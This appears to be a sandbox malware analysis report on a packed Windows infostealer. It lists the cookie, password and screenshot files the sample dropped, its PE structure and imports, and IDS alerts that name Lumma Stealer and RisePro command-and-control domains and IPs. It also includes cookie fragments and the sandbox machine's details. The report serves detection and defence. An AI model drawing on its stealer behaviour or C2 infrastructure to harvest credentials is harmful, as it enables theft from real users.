Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\xq6J5KlULX6jlR3rET0T.exe

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	PE32 executable (GUI) Intel 80386, for MS Windows
Category:	dropped
Size (bytes):	468480
Entropy (8bit):	7.707638639777151
Encrypted:	false
SSDEEP:	12288:8fUVPK8c9FHGovaqSdUgGe2floqIIxuSyovf4CzBIG6Dac:RK/9F1vaqbeeloqII4SHv3OG6j
MD5:	F14B083F53FEFD0071732BF5C0DCD6FA
SHA1:	661566E9131C39A1B34CABDE9A14877D9BCB3D90
SHA-256:	2A7B010296F77BC811CDB2802DC11B7DA7E486A3C7CDBB6B2783B12B828BD57D
SHA-512:	889804F0872D7882EB9160EA4B0EF7E86079006965B988BB5426F36CB2B9B354F03C411759FF74D91905EAA67B88EA5F11BE76B5F0F4F47B8AA9B53FCB9FBCDF
Malicious:	true
Antivirus:	Antivirus: Avira, Detection: 100% Antivirus: Joe Sandbox ML, Detection: 100% Antivirus: ReversingLabs, Detection: 45%
Joe Sandbox View:	Filename: PstCgdvsgB.exe, Detection: malicious, Browse
Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......I../...\|...\|...\|..}...\|..}...\|..}...\|..}...\|...\|V..\|.l.}...\|.l.}...\|.l.}@..\|.o.}...\|.o.}...\|Rich...\|........PE..L....yOf...............'.............F............@..........................p............@.................................DY..(............................P.......?...............................>..@...............@............................text...$........................... ..`.bss................................ ..`.rdata..x...........................@..@.data...d....p.......>..............@....reloc.......P......................@..B........................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\spanDxygJpUhAdhw\z0bEzvXuiSwcWeb Data

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 8, database pages 89, cookie 0x37, schema 4, UTF-8, version-valid-for 8
Category:	dropped
Size (bytes):	196608
Entropy (8bit):	1.1239949490932863
Encrypted:	false
SSDEEP:	384:g2qOB1nxCkvSA1LyKOMq+8iP5GDHP/0j:9q+n0E91LyKOMq+8iP5GLP/0
MD5:	271D5F995996735B01672CF227C81C17
SHA1:	7AEAACD66A59314D1CBF4016038D3A0A956BAF33
SHA-256:	9D772D093F99F296CD906B7B5483A41573E1C6BD4C91EF8DBACDA79CDF1436B4
SHA-512:	62F15B7636222CA89796FCC23FC5722657382FAAAFEDC937506CAB3286AA696609F2A5A8F479158574D9FB92D37C0AA74EA15F7A172EBF1F3D260EF6124CF8B9
Malicious:	false
Preview:	SQLite format 3......@ .......Y...........7......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw\Cookies\Chrome_Default.txt

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	ASCII text, with very long lines (369), with CRLF line terminators
Category:	dropped
Size (bytes):	530
Entropy (8bit):	6.005544722730675
Encrypted:	false
SSDEEP:	12:c7F2v4kMx/6UsMbf4/LJPhvkRj6a9kuEYTCRopYxOOVtouEYv:SCJyHXbfQJPh8RdkYiFoYv
MD5:	987FB1A1830B0EB5C0D306F8A2DE9981
SHA1:	8374E6320AD99C3FF177A9889F1AB75448F6EB19
SHA-256:	5EF24A6CE57CA3048431555909EC23CD5494DA76845F84271946442249DDA891
SHA-512:	9E2A48264084B79051FC275DD7780A5552B56220459A1CDDBE6F6A307FE0E5759AE20BC243D085D9734153879AC4E66233AB83F92551DD8092EABF85B16F2D15
Malicious:	false
Preview:	.google.com.TRUE./.TRUE.1712298002.NID.ENC893_djEwx6CLkXLg8AuSZWCgylmAsMNnd1LSfbcL+IfCgMvX/m5IrzdSwxt6X6n5S6C7wCoUoWvuixZpzrMizGZc5ohIpmsvlOrGTOhFkQ4+lCF6fVH0QNPBBb27o2nXM8em7EAYS1bYZC2LV04SqpgyxJmdfFA7UyWUoK8kFZQDRl0vdOzWdvAoumw2skuCCtJC2oG3z3OYbLTLDbM7wYvVmfDeqtnZRihAAt+ptqI6cfY1a+KO9XP+4XkDSXW7JhsexYHBqzSSBmUisGZ7f9E=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=...google.com.FALSE./.TRUE.1699078840.1P_JAR.ENC893_djEwZKzV9KAslchfQWnVTck71JHMVRC24lvAWgdl5WpYIXlINsbQSVWzkKU=_DrTFYLsM7YVgEN6pCv/RXeb8Bq748EwHbsLCIGv1kEc=..

C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw\information.txt

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	ASCII text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	6111
Entropy (8bit):	5.487317497437124
Encrypted:	false
SSDEEP:	96:xWf+ZORDlcBC1IUlzhg/8f7bzfkZbngHNUbg3x:x09pl84IUlzhS8f7bgZrQB
MD5:	D4767E1EF41E7A3EC496E468EEEB972A
SHA1:	FB432BAC0CA814BABA0C5FFE3FC4DB6F11D5DC3D
SHA-256:	A6C7B7926715FFF955524D190283801A8E499387B1A18126F47660EF2096D2BB
SHA-512:	A805239F687F49FA5EBA492C4C0FF844BD9C35416ECD57F1D72B79C743969BACABFDAAA0C5E83A7DA99922B06F64BA66337CF9B697811A519248DCF54C157E57
Malicious:	false
Preview:	Build: Default12..Version: 2.0....Date: Thu May 23 18:21:59 2024.MachineID: 9e146be9-c76a-4720-bcdb-53011b87bd06..GUID: {a33c7340-61ca-11ee-8c18-806e6f6e6963}..HWID: f731566c135856b59ca2490a54344cfc....Path: C:\Users\user\Desktop\tMO4FVIc9l.exe..Work Dir: C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw....IP: 8.46.123.175..Location: US, New York City..ZIP (Autofills): -..Windows: Windows 10 Pro [x64]..Computer Name: 648351 [WORKGROUP]..User Name: user..Display Resolution: 1280x1024..Display Language: en-CH..Keyboard Languages: English (United Kingdom) / English (United Kingdom)..Local Time: 23/5/2024 18:21:59..TimeZone: UTC-5....[Hardware]..Processor: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz..CPU Count: 4..RAM: 8191 MB..VideoCard #0: Microsoft Basic Display Adapter....[Processes]..System [4]..Registry [92]..smss.exe [328]..csrss.exe [412]..wininit.exe [488]..csrss.exe [496]..winlogon.exe [560]..services.exe [632]..lsass.exe [652]..svchost.exe [752]..fontdrvhost.exe [780]..

C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw\passwords.txt

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	Unicode text, UTF-8 text, with CRLF, LF line terminators
Category:	dropped
Size (bytes):	4897
Entropy (8bit):	2.518316437186352
Encrypted:	false
SSDEEP:	48:4MMMMMMMMMMdMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMM1MMMMMMMMMMdMMMMMMMM3:q
MD5:	B3E9D0E1B8207AA74CB8812BAAF52EAE
SHA1:	A2DCE0FB6B0BBC955A1E72EF3D87CADCC6E3CC6B
SHA-256:	4993311FC913771ACB526BB5EF73682EDA69CD31AC14D25502E7BDA578FFA37C
SHA-512:	B17ADF4AA80CADC581A09C72800DA22F62E5FB32953123F2C513D2E88753C430CC996E82AAE7190C8CB3340FCF2D9E0D759D99D909D2461369275FBE5C68C27A
Malicious:	false
Preview:	................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Temp\trixyDxygJpUhAdhw\screenshot.png

Download File

Process:	C:\Users\user\Desktop\tMO4FVIc9l.exe
File Type:	PNG image data, 1280 x 1024, 8-bit/color RGBA, non-interlaced
Category:	dropped
Size (bytes):	686328
Entropy (8bit):	7.929372166128709
Encrypted:	false
SSDEEP:	12288:e7bEafFGDd/trS7dYDRjGHWGcCHJGjrH35JmPVJB/P4xp8CzutREoLZP:efEiFGD5icIdPVJFP4P9SnLZP
MD5:	AA3BEDA3FF46F6670094E3737A76C1D5
SHA1:	402698999DE8CFC709FEC83CE90B7F27DCE469A4
SHA-256:	B27806032F618D05AA4B03E5C2079C678584CBF8498CF6CF51597CB82914D0EF
SHA-512:	EB3114CFE79DC4B4CC080FFE3CAE006336C963200F8F3BBA602551F3CB8164FAE1ABEFEE908F2C6516A5538644B763C2FB4791E8511CEE1425345E70015E081A
Malicious:	false
Preview:	.PNG........IHDR................C....sRGB.........gAMA......a.....pHYs..........o.d....IDATx^...]..{......y.....=..t....j..m..$$..D.....6n.v6.D!..B.hl..d...!r.A$!!..&.`._....;u.s.=..+$8Z..j.s$..o}.w.6oc.,...q...*?.u.......j..{.2d.....9....~....Ez2..:.H.i.9........k......].?...._..=...O].i8..MJm..A.s.X...o.zN.:..W.H.....WU}..4..^..=.....WV....1/....^.Y..\|G..........aS.....o?.z.....o>..o..~.....$.\pA..]".Y.%z.)..1z....{.^.....j.G.Z..\|...q......:(.#...{.0.<...'.q..K.....c..{..$...w.......>...s.=a..1g...}.u.Y.zf...{/.....>.1..{.1......[......M,..!/.k3..9.q....Skc=.z.9.a.^....%.{..s3.&.{,.b..]......}.K;f..~....B}..R.G...w%z.....Y.........nw...{-L..3^7b...c~l..c.....]..X.Q.....=w.3...k`.....#..L.=.;.8&'...i..y....q.].....z&..c......O....s.a.....b-..q.qnJ\.[.GM.y...z'...>1.....s...<.l>...7......N...ru=....=F....9..h....2....%.7^...fr.^w...s.oR..)..:.zv.....0~..g....).-aL>sv.u...B.{.F.....N} G.c..x..xl......[M..gL^o....>Z;j.x.......N1.s.....

C:\Windows\appcompat\Programs\Amcache.hve

Download File

Process:	C:\Windows\SysWOW64\WerFault.exe
File Type:	MS Windows registry file, NT/2000 or above
Category:	dropped
Size (bytes):	1835008
Entropy (8bit):	4.468600281698291
Encrypted:	false
SSDEEP:	6144:4zZfpi6ceLPx9skLmb0fEZWSP3aJG8nAgeiJRMMhA2zX4WABluuNrjDH5S:uZHtEZWOKnMM6bFptj4
MD5:	C0E94A8AEABB9EE2AEB5EB37F314463A
SHA1:	DC11D8569A9DA910E88A8321A562A6FD8AB7593D
SHA-256:	5EC30A12223F334773E4DFBB6D92D45E96E52A65723B3A323BD2A821BADFF9D9
SHA-512:	536FE81FB97F6E200536D225B3308A9566947BC96D14C66E1C1DCA1245FE58F0090DC76CD6D5C00C8E226486D3B7EE9C5ED120E34BF61F84ED1A140A8A45E520
Malicious:	false
Preview:	regfH...H....\.Z.................... ...........\.A.p.p.C.o.m.p.a.t.\.P.r.o.g.r.a.m.s.\.A.m.c.a.c.h.e...h.v.e....c...b...#.......c...b...#...........c...b...#......rmtm...._..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32 executable (GUI) Intel 80386, for MS Windows
Entropy (8bit):	7.9639382810091615
TrID:	Win32 Executable (generic) a (10002005/4) 99.96% Generic Win/DOS Executable (2004/3) 0.02% DOS Executable Generic (2002/1) 0.02% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	tMO4FVIc9l.exe
File size:	3'134'976 bytes
MD5:	6bc7f3c7927f5fc13a4410f1770c2dfe
SHA1:	4fd9306a40681e1f881168644f991c30824b02cc
SHA256:	c6ec11a31d4c28480f4ee3cc744792e12d7919cfffff5b7ca86649c904b7abda
SHA512:	15a8e425fc9838af7b4084343da464ca00a89fbbed4f70eb13d6e7d5f1970f646748e12fe0c2e12fb89165af57338c9625178282b277c3c5ce9773876bc65a3f
SSDEEP:	49152:TkSSEjtKhmW9bkolQcTF9dbrYszEEUJcbl9YF7FqpSoEGUwXjLRd2xcSG:Ndj0kWNTFjvLL4RLoEajLLWcS
TLSH:	E1E523856ACE1794C998E6345626FFFCB2791E956691CF1E17B83AC3E8F30308476843
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L....iLf...............'.............a5...........@.......................... p.......0...@................................

File Icon


Icon Hash:	8596a1a0a1a1b171

Static PE Info

General

Entrypoint:	0x7561fa
Entrypoint Section:	.vmp
Digitally signed:	false
Imagebase:	0x400000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, 32BIT_MACHINE
DLL Characteristics:	DYNAMIC_BASE, TERMINAL_SERVER_AWARE
Time Stamp:	0x664C6914 [Tue May 21 09:27:48 2024 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	6
OS Version Minor:	0
File Version Major:	6
File Version Minor:	0
Subsystem Version Major:	6
Subsystem Version Minor:	0
Import Hash:	7ad43923e3c89560dc5c9969c825cbc8

Entrypoint Preview

Instruction
push BA099D81h
pushfd
sub word ptr [esp+04h], 4126h
sub byte ptr [esp+04h], FFFFFF83h
call 00007F4531233334h
mov di, word ptr [edi]
jmp 00007F453137DBF4h
push 971AB90Ah
jmp 00007F4531162564h
mov ebx, A21C6468h
fldcw word ptr [ecx+3EB6B709h]
out dx, eax
in eax, dx
dec ebx
outsd
or dl, byte ptr [eax-40h]
sub byte ptr [esi], bh

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x333fe0	0x12c	.vmp
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x5af000	0x152602	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x0	0x0
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x5ad000	0x1a5c	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x2d7078	0x18	.vmp
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x5ac750	0x40	.vmp
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2b3000	0x84	.vmp
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x3841dc	0x40	.vmp
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	MD5	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x15bbc8	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x15d000	0x27e32	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x185000	0x4930	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x18a000	0x128680	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.vmp	0x2b3000	0x588	0x600	e1d0169b583e98ecd808079673ddf28c	False	0.06901041666666667	data	0.4313292015194326	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.vmp	0x2b4000	0x2f8f20	0x2f9000	43475c9af5db159f2015ff17d810e504	unknown	unknown	unknown	unknown	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.reloc	0x5ad000	0x1a5c	0x1c00	7d132d2a06f27fa211724c71b5599f4c	False	0.3662109375	data	5.734566063087419	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x5af000	0x152602	0x2000	3d38b4fa63b27814c5bc97e26f950b26	False	0.61572265625	data	6.135733770645974	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type	Language	Country	ZLIB Complexity
MUI	0x5af70c	0x110	data			0.5551470588235294
MUI	0x5af81c	0x110	data			0.5551470588235294
WEVT_TEMPLATE	0x5b0eac	0x4f2	data			0.03823529411764706
RT_BITMAP	0x5b13a0	0x1246e	empty			0
RT_BITMAP	0x5c3810	0x1246e	empty			0
RT_BITMAP	0x5d5c80	0x1246e	empty			0
RT_BITMAP	0x5e80f0	0x1246e	empty			0
RT_BITMAP	0x5fa560	0x1246e	empty			0
RT_BITMAP	0x60c9d0	0x1246e	empty			0
RT_BITMAP	0x61ee40	0x27c0	empty			0
RT_BITMAP	0x621600	0x27c0	empty			0
RT_BITMAP	0x623dc0	0x37b0	empty			0
RT_BITMAP	0x627570	0x37b0	empty			0
RT_BITMAP	0x62ad20	0x1246e	empty			0
RT_BITMAP	0x63d190	0x1246e	empty			0
RT_BITMAP	0x64f600	0x1246e	empty			0
RT_BITMAP	0x661a70	0x1246e	empty			0
RT_BITMAP	0x673ee0	0x120d2	empty			0
RT_BITMAP	0x685fb4	0x1246e	empty			0
RT_BITMAP	0x698424	0x7ef6	empty			0
RT_BITMAP	0x6a031c	0x39e	empty			0
RT_BITMAP	0x6a06bc	0x332	empty			0
RT_BITMAP	0x6a09f0	0x247a	empty			0
RT_BITMAP	0x6a2e6c	0x552	empty			0
RT_BITMAP	0x6a33c0	0x2462	empty			0
RT_BITMAP	0x6a5824	0x1246e	empty			0
RT_BITMAP	0x6b7c94	0x1246e	empty			0
RT_BITMAP	0x6ca104	0x28e36	empty			0
RT_BITMAP	0x6f2f3c	0x7ef6	empty			0
RT_BITMAP	0x6fae34	0x33f2	empty			0
RT_BITMAP	0x6fe228	0x33da	empty			0
RT_ICON	0x5af92c	0x1060	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced	Russian	Russia	0.8838263358778626
RT_GROUP_ICON	0x5b098c	0x14	data	Russian	Russia	1.05
RT_MANIFEST	0x5b09a0	0x50b	XML 1.0 document, ASCII text, with CRLF line terminators			0.42835011618900076

Imports

DLL	Import
KERNEL32.dll	GetVersionExA
USER32.dll	wsprintfA
GDI32.dll	CreateCompatibleBitmap
ADVAPI32.dll	RegQueryValueExA
SHELL32.dll	ShellExecuteA
ole32.dll	CoInitialize
WS2_32.dll	WSAStartup
CRYPT32.dll	CryptUnprotectData
SHLWAPI.dll	PathFindExtensionA
gdiplus.dll	GdipGetImageEncoders
SETUPAPI.dll	SetupDiEnumDeviceInfo
ntdll.dll	RtlUnicodeStringToAnsiString
RstrtMgr.DLL	RmStartSession
KERNEL32.dll	HeapAlloc, HeapFree, ExitProcess, GetModuleHandleA, LoadLibraryA, GetProcAddress

Possible Origin

Language of compilation system	Country where language is spoken	Map
Russian	Russia

Network Behavior

Snort IDS Alerts

Timestamp	Protocol	SID	Message	Source Port	Dest Port	Source IP	Dest IP
05/24/24-00:22:10.983112	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49732	443	192.168.2.6	188.114.96.3
05/24/24-00:22:20.530627	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49745	443	192.168.2.6	188.114.96.3
05/24/24-00:22:23.772643	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49751	443	192.168.2.6	188.114.96.3
05/24/24-00:22:22.518638	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49747	443	192.168.2.6	188.114.96.3
05/24/24-00:22:12.085167	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49734	443	192.168.2.6	188.114.96.3
05/24/24-00:22:05.782799	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49721	443	192.168.2.6	188.114.96.3
05/24/24-00:22:15.606325	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49740	443	192.168.2.6	188.114.96.3
05/24/24-00:22:14.912811	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49739	443	192.168.2.6	188.114.96.3
05/24/24-00:22:27.200612	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49753	443	192.168.2.6	188.114.96.3
05/24/24-00:21:54.577369	TCP	2049060	ET TROJAN RisePro TCP Heartbeat Packet	49710	50500	192.168.2.6	5.42.65.116
05/24/24-00:22:09.677486	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49726	443	192.168.2.6	188.114.96.3
05/24/24-00:22:13.704960	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49736	443	192.168.2.6	188.114.96.3
05/24/24-00:22:04.255674	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49717	443	192.168.2.6	188.114.96.3
05/24/24-00:22:28.906409	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49755	443	192.168.2.6	188.114.96.3
05/24/24-00:22:16.187312	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49742	443	192.168.2.6	188.114.96.3
05/24/24-00:22:03.520068	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49715	443	192.168.2.6	188.114.96.3
05/24/24-00:22:01.482311	TCP	2046269	ET TROJAN [ANY.RUN] RisePro TCP (Activity)	49710	50500	192.168.2.6	5.42.65.116
05/24/24-00:21:55.315556	TCP	2046267	ET TROJAN [ANY.RUN] RisePro TCP (External IP)	50500	49710	5.42.65.116	192.168.2.6
05/24/24-00:21:55.095747	TCP	2046266	ET TROJAN [ANY.RUN] RisePro TCP (Token)	50500	49710	5.42.65.116	192.168.2.6
05/24/24-00:22:06.685867	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49723	443	192.168.2.6	188.114.96.3
05/24/24-00:22:23.759277	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49750	443	192.168.2.6	188.114.96.3
05/24/24-00:22:17.527410	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49744	443	192.168.2.6	188.114.96.3
05/24/24-00:22:32.208689	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49757	443	192.168.2.6	188.114.96.3
05/24/24-00:22:03.499118	UDP	2052761	ET TROJAN Lumma Stealer Related CnC Domain in DNS Lookup (employhabragaomlsp .shop)	65237	53	192.168.2.6	1.1.1.1
05/24/24-00:22:05.249068	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49720	443	192.168.2.6	188.114.96.3
05/24/24-00:22:25.432173	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49752	443	192.168.2.6	188.114.96.3
05/24/24-00:22:14.645862	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49738	443	192.168.2.6	188.114.96.3
05/24/24-00:22:05.172883	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49719	443	192.168.2.6	188.114.96.3
05/24/24-00:22:21.615908	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49746	443	192.168.2.6	188.114.96.3
05/24/24-00:22:15.797814	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49741	443	192.168.2.6	188.114.96.3
05/24/24-00:22:04.759337	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49718	443	192.168.2.6	188.114.96.3
05/24/24-00:22:14.452009	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49737	443	192.168.2.6	188.114.96.3
05/24/24-00:22:06.291359	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49722	443	192.168.2.6	188.114.96.3
05/24/24-00:22:27.489896	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49754	443	192.168.2.6	188.114.96.3
05/24/24-00:22:09.774730	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49729	443	192.168.2.6	188.114.96.3
05/24/24-00:22:06.824727	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49724	443	192.168.2.6	188.114.96.3
05/24/24-00:22:22.849766	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49748	443	192.168.2.6	188.114.96.3
05/24/24-00:22:30.450870	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49756	443	192.168.2.6	188.114.96.3
05/24/24-00:22:04.185732	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49716	443	192.168.2.6	188.114.96.3
05/24/24-00:22:17.199190	TCP	2052775	ET TROJAN Observed Lumma Stealer Related Domain (employhabragaomlsp .shop in TLS SNI)	49743	443	192.168.2.6	188.114.96.3

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
May 24, 2024 00:21:54.507107973 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:54.516783953 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:54.516876936 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:54.577368975 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:54.582541943 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:55.095746994 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:55.137798071 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:55.227533102 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:55.227767944 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:55.232767105 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:55.315556049 CEST	50500	49710	5.42.65.116	192.168.2.6
May 24, 2024 00:21:55.356566906 CEST	49710	50500	192.168.2.6	5.42.65.116
May 24, 2024 00:21:55.491153002 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:55.491188049 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:55.491276026 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:55.493891001 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:55.493912935 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:55.987385035 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:55.987483025 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:55.990895987 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:55.990909100 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:55.991151094 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:56.039720058 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:56.086492062 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:56.205178022 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:56.205295086 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:56.205351114 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:56.207935095 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:56.207952976 CEST	443	49711	34.117.186.192	192.168.2.6
May 24, 2024 00:21:56.207967997 CEST	49711	443	192.168.2.6	34.117.186.192
May 24, 2024 00:21:56.207973957 CEST	443	49711	34.117.186.192	192.168.2.6
